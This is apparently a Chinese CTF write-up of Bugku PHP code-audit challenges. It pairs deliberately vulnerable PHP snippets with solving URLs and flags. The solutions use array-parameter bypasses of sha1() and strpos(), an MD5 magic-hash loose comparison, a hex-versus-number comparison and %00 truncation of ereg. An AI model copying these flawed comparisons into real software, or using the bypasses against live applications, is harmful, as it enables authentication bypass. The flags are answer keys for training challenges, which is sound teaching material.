flag{bugku_null_numeric}
sha()函数比较绕过#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| http://120.24.86.145:9009/7.php
<?php
$flag = "flag";
if (isset($_GET['name']) and isset($_GET['password']))
{
var_dump($_GET['name']);
echo "
";
var_dump($_GET['password']);
var_dump(sha1($_GET['name']));
var_dump(sha1($_GET['password']));
if ($_GET['name'] == $_GET['password'])
echo '
Your password can not be your name!
';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
echo '
Invalid password.
';
}
else
echo '
Login first!
';
?>
|
http://120.24.86.145:9009/7.php?name[]&password[]=1
flag{bugku--daimasj-a2}
md5加密相等绕过#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| http://120.24.86.145:9009/13.php
<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "flag{*}";
} else {
echo "false!!!";
}}
else{echo "please input a";}
?>
|
http://120.24.86.145:9009/13.php?a=240610708
flag{bugku-dmsj-am9ls}
十六进制与数字比较#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| http://120.24.86.145:9009/20.php
<?php
error_reporting(0);
function noother_says_correct($temp)
{
$flag = 'flag{test}';
$one = ord('1'); //ord — 返回字符的 ASCII 码值
$nine = ord('9'); //ord — 返回字符的 ASCII 码值
$number = '3735929054';
// Check all the input characters!
for ($i = 0; $i < strlen($number); $i++)
{
// Disallow all the digits!
$digit = ord($temp{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
// Aha, digit not allowed!
return "flase";
}
}
if($number == $temp)
return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
?>
|
http://120.24.86.145:9009/20.php?password=0xdeadc0de
flag{Bugku-admin-ctfdaimash}
ereg正则%00截断#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| http://120.24.86.145:9009/5.php
<?php
$flag = "xxx";
if (isset ($_GET['password']))
{
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
{
echo 'You password must be alphanumeric';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
if (strpos ($_GET['password'], '*-*') !== FALSE) //strpos — 查找字符串首次出现的位置
{
die('Flag: ' . $flag);
}
else
{
echo('- have not been found');
}
}else{
echo 'Invalid password';
}
}
?>
|
1
| http://120.24.86.145:9009/5.php?password=9e9%00*-*
|
flag{bugku-dm-sj-a12JH8}
strpos数组绕过#
1
2
3
4
5
6
7
8
9
10
11
12
13
| http://120.24.86.145:9009/15.php
<?php
$flag = "flag";
if (isset ($_GET['ctf'])) {
if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE)
echo '必须输入数字才行';
else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE)
die('Flag: '.$flag);
else
echo '骚年,继续努力吧啊~';
}
?>
|
http://120.24.86.145:9009/15.php?ctf=1%00%23biubiubiu
或
http://120.24.86.145:9009/15.php?ctf[]
flag{Bugku-D-M-S-J572}
数字验证正则绕过#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| http://120.24.86.145:9009/21.php
<?php
error_reporting(0);
$flag = 'flag{test}';
if ("POST" == $_SERVER['REQUEST_METHOD'])
{
$password = $_POST['password'];
if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)) //preg_match — 执行一个正则表达式匹配
{
echo 'flag';
exit;
}
while (TRUE)
{
$reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
if (6 > preg_match_all($reg, $password, $arr))
break;
$c = 0;
$ps = array('punct', 'digit', 'upper', 'lower'); //[[:punct:]] 任何标点符号 [[:digit:]] 任何数字 [[:upper:]] 任何大写字母 [[:lower:]] 任何小写字母
foreach ($ps as $pt)
{
if (preg_match("/[[:$pt:]]+/", $password))
$c += 1;
}
if ($c < 3) break;
//>=3,必须包含四种类型三种与三种以上
if ("42" == $password) echo $flag;
else echo 'Wrong password';
exit;
}
}
?>
|
flag{Bugku_preg_match}